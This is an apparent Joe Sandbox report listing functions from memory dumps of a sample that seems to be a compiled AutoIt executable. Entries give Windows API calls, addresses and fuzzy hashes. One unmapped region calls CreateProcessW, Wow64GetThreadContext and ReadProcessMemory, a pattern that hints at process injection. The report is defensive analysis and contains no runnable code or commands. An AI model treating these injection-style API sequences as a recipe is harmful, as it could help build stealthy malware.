Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 6d82cf41eaf45812e6762940ba94d1af3c417dc91e7041253a4ba5f697bb2181
Instruction ID: 4ec82c75ec3c2b35cf93c2ea27136fc4d3966f8fd1aa33e2bd56fe19b05d94c5
Opcode Fuzzy Hash: 6d82cf41eaf45812e6762940ba94d1af3c417dc91e7041253a4ba5f697bb2181
Instruction Fuzzy Hash: EF22AA70608241DFCB14CF18C484B2ABBF1BF89394F54892DF59A8B361D739E955CB92

Function 007D6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007D6F6B

Part of subcall function 00764ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 007D6F5A, 007D6F63

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 18129b354cbbe872d6c6e21da597346ad540e62cc869d68b55dcb041271bf770
Instruction ID: 7b18b4a03187e357478547ae4407796f4a5eb4c654b42f35d6b2ef7b7d58c5b3
Opcode Fuzzy Hash: 18129b354cbbe872d6c6e21da597346ad540e62cc869d68b55dcb041271bf770
Instruction Fuzzy Hash: D4B15E31108201DFCB18EF24C49596EB7F5AF94314F14895EF896973A2EB38ED49CB92

Function 00762DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 007A2C8C

Part of subcall function 00763AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00763A97,?,?,00762E7F,?,?,?,00000000), ref: 00763AC2

Part of subcall function 00762DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00762DC4

Strings

X, xrefs: 007A2C5A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: a2eacb349c3aa6c5b3fac9f8cee49e9a276f8abbb99f2e4dbff648c441be9288
Instruction ID: f230e40474831c7a929c685b1b026b09e81731f731e095c39a81388b666b3401
Opcode Fuzzy Hash: a2eacb349c3aa6c5b3fac9f8cee49e9a276f8abbb99f2e4dbff648c441be9288
Instruction Fuzzy Hash: 2521A871A00298DFDB41EF94D8497EE7BF8AF49714F008059E905E7242DBBC5A89CF61

Function 00763837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00763908

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 4f2513117a602d8b03c6c839068250c04d2f7c8b44424f222cd5315f65aaeb53
Instruction ID: a6fdded9cef4c4d1d84a07c32e95f1b6b3db890065136ab09e58be3779ff0bb3
Opcode Fuzzy Hash: 4f2513117a602d8b03c6c839068250c04d2f7c8b44424f222cd5315f65aaeb53
Instruction Fuzzy Hash: 60316F71504701DFD761DF24D8897E7BBE8FB89708F00092EF99A87250E779AA44CB62

Function 01242555 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01242D13
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01242DA9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01242DCB

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: f7b25e27a7efde43ea051b073c279829cd79635ed44d0c847ba8f4dae313c883
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: F012CC24A24658C7EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4E81CB5A

Function 0077FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0077FD1F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4c817cda696684ea1cbf81913bd613e9614173281a0a8266be6429560475db27
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 96311274A00109DBCB29DF69D690969FBA2FF49380B24C6A5E809CF652D735EDC1CBD0

Function 00764ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00764E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00764EDD,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E9C
Part of subcall function 00764E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00764EAE
Part of subcall function 00764E90: FreeLibrary.KERNEL32(00000000,?,?,00764EDD,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764EFD

Part of subcall function 00764E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007A3CDE,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E62
Part of subcall function 00764E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00764E74
Part of subcall function 00764E59: FreeLibrary.KERNEL32(00000000,?,?,007A3CDE,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E87

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 42a501ce7d45e777b960c960612120caf57e98c111b7c77127cca8d7b4f9a349
Instruction ID: df1830c49cb83a3434de84a2177b53c08f87b3214cd7340ba71bd547777c6a4d
Opcode Fuzzy Hash: 42a501ce7d45e777b960c960612120caf57e98c111b7c77127cca8d7b4f9a349
Instruction Fuzzy Hash: 4B11E332610205EACB15BF60DC0AFED77A5AF50710F24842EF943A61C1EE799A05A790

Function 00798402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00798440

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7544afde25ad8a229b270cea4519efe5c82f8e922a8de5dbcc8092a21133bd57
Instruction ID: 2973fd8be91629e25ba979202663a3634f436104f5d0523a87e02faed71bb0a0
Opcode Fuzzy Hash: 7544afde25ad8a229b270cea4519efe5c82f8e922a8de5dbcc8092a21133bd57
Instruction Fuzzy Hash: 0611157590420AAFCF05DF58E94599A7BF9EF49314F1044A9F808AB312DA31EA21CBA5

Function 00795000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00794C7D: RtlAllocateHeap.NTDLL(00000008,00761129,00000000,?,00792E29,00000001,00000364,?,?,?,0078F2DE,00793863,00831444,?,0077FDF5,?), ref: 00794CBE

_free.LIBCMT ref: 0079506C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 7b181d2c7f676acce052b823228af61da5d7565e05ba613e6550ff70ab664744
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: F0014E72204B05ABE732CF69E84595AFBECFB85370F25061DE184932C0E6346805C7B4

Function 0078E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 7208489c50f1aa9695750747b3806739ac7b8b053efa0a1869112e180a32f68f
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 8DF02D32650A14E6DB313A699C0DB5A33989F52330F140715F524D31E2EB7CE80287A6

Function 00794C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00761129,00000000,?,00792E29,00000001,00000364,?,?,?,0078F2DE,00793863,00831444,?,0077FDF5,?), ref: 00794CBE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bfe19f01a71632c7591af883f510562a7eb6b8c323e566f5ad93b18964d39fab
Instruction ID: 1bae633e93d52dd45413f10dc8405ad851d09a62df5f2bbaaab35c75ba529272
Opcode Fuzzy Hash: bfe19f01a71632c7591af883f510562a7eb6b8c323e566f5ad93b18964d39fab
Instruction Fuzzy Hash: D0F0B432642224AEDF216F62BC09F5A3788BF427A1B144616B815A6281CA7CD80286B0

Function 00793820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6,?,00761129), ref: 00793852

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bc81fae7c81d83a1f22d05bd048a45603f5a1d7f49b31a98a6e1df33f6451941
Instruction ID: 56ebba0b6e2f205615b26477981bb369b29e4ccf559b975c17785c4d7979ab38
Opcode Fuzzy Hash: bc81fae7c81d83a1f22d05bd048a45603f5a1d7f49b31a98a6e1df33f6451941
Instruction Fuzzy Hash: 4EE0E5321406299AEE213667BC09F9A3749AF42BB0F050022BC0592980CB5CDD0192F0

Function 00764F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764F6D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e532cf490c35b1ffd621f329c3a85095efcac5d65f85795e05109a62d2f1953c
Instruction ID: 6da3bd3f00a955ff1963265a2b3c1418ef85bc234a4bead6961398e35ba31f8b
Opcode Fuzzy Hash: e532cf490c35b1ffd621f329c3a85095efcac5d65f85795e05109a62d2f1953c
Instruction Fuzzy Hash: 54F03071105751CFDB389F64D494862B7E5AF14319318897EE5DB82511C7399848DF10

Function 00762DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00762DC4

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 067506ce4d5fbbbbb6a9d6285ab92780f5bf30d0daa3a643583b6a41aea30f69
Instruction ID: f7ff4f29ed9f27e9b423cab033a936e00f9d0818ff2709f9bce065a8165321d3
Opcode Fuzzy Hash: 067506ce4d5fbbbbb6a9d6285ab92780f5bf30d0daa3a643583b6a41aea30f69
Instruction Fuzzy Hash: 3DE0CD766001249BD71196589C09FEA77DDDFC8790F044171FD09D7248D964AD80C550

Function 00762B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00763837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00763908

Part of subcall function 0076D730: GetInputState.USER32 ref: 0076D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00762B6B

Part of subcall function 007630F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0076314E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 2a47a9afa6a4a2013b7e0ef1065418f27587f36791020670975415c5f0d10840
Instruction ID: a00f6aa3d8feb63aae8e5022abea421f58f7f0b6cbb7237acb9554f7ef49cefe
Opcode Fuzzy Hash: 2a47a9afa6a4a2013b7e0ef1065418f27587f36791020670975415c5f0d10840
Instruction Fuzzy Hash: 12E0262130024482CE08BBB0A85E4BDE34ADBD1751F00083EFD43831A3CF2C4949C252

Function 007A039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,007A0704,?,?,00000000,?,007A0704,00000000,0000000C), ref: 007A03B7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219a6c38abdccedf0153a16586a6fc1a0015b3e2093bf124ba201efd44fa3fc
Instruction ID: e1e78d0b9a5c555fd6da7748de8e6328bbce022da412291de4a2845c63816254
Opcode Fuzzy Hash: 4219a6c38abdccedf0153a16586a6fc1a0015b3e2093bf124ba201efd44fa3fc
Instruction Fuzzy Hash: AAD06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C736E831EB94

Function 00761CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00761CBC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 14406750a3c9d4f92ba6825bbc4ae91d0a3fb2290ca3a1e0c1e4c42aa526a92b
Instruction ID: 49b6417f67a244ad0a27caca103bb461700320ae552d3c9769ee254c791d21c3
Opcode Fuzzy Hash: 14406750a3c9d4f92ba6825bbc4ae91d0a3fb2290ca3a1e0c1e4c42aa526a92b
Instruction Fuzzy Hash: A6C09236280308AFF6158B80BD4EF207768B388F01F148801F609AA6E3C3A62824EA54

Function 01243554 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01243569

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 3b5c5e200ab141acf67fa4929ba269ac58cd57708ac850453d3476b8b140e4b7
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 75E0BF7494010DEFDB04DFA4D5496DD7BB4FF04301F1006A5FD05D7680DB309E648A62

Function 01243558 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01243569

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: a99ceea1bdda5b88cbc6f759162eeb48dc6cdb12d43500639667da46cf79d71e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: CEE0E67494010DDFDB00DFB4D54969D7BB4FF04301F100265FD01D2280D6309E608A62

Non-executed Functions

Function 007F9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007F961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007F965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007F969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007F96C9
SendMessageW.USER32 ref: 007F96F2
GetKeyState.USER32(00000011), ref: 007F978B
GetKeyState.USER32(00000009), ref: 007F9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007F97AE
GetKeyState.USER32(00000010), ref: 007F97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007F97E9
SendMessageW.USER32 ref: 007F9810
SendMessageW.USER32(?,00001030,?,007F7E95), ref: 007F9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007F992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007F9941
SetCapture.USER32(?), ref: 007F994A
ClientToScreen.USER32(?,?), ref: 007F99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007F99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F99D6
ReleaseCapture.USER32 ref: 007F99E1
GetCursorPos.USER32(?), ref: 007F9A19
ScreenToClient.USER32(?,?), ref: 007F9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 007F9A80
SendMessageW.USER32 ref: 007F9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 007F9AEB
SendMessageW.USER32 ref: 007F9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007F9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007F9B4A
GetCursorPos.USER32(?), ref: 007F9B68
ScreenToClient.USER32(?,?), ref: 007F9B75
GetParent.USER32(?), ref: 007F9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 007F9BFA
SendMessageW.USER32 ref: 007F9C2B
ClientToScreen.USER32(?,?), ref: 007F9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007F9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 007F9CDE
SendMessageW.USER32 ref: 007F9D01
ClientToScreen.USER32(?,?), ref: 007F9D4E
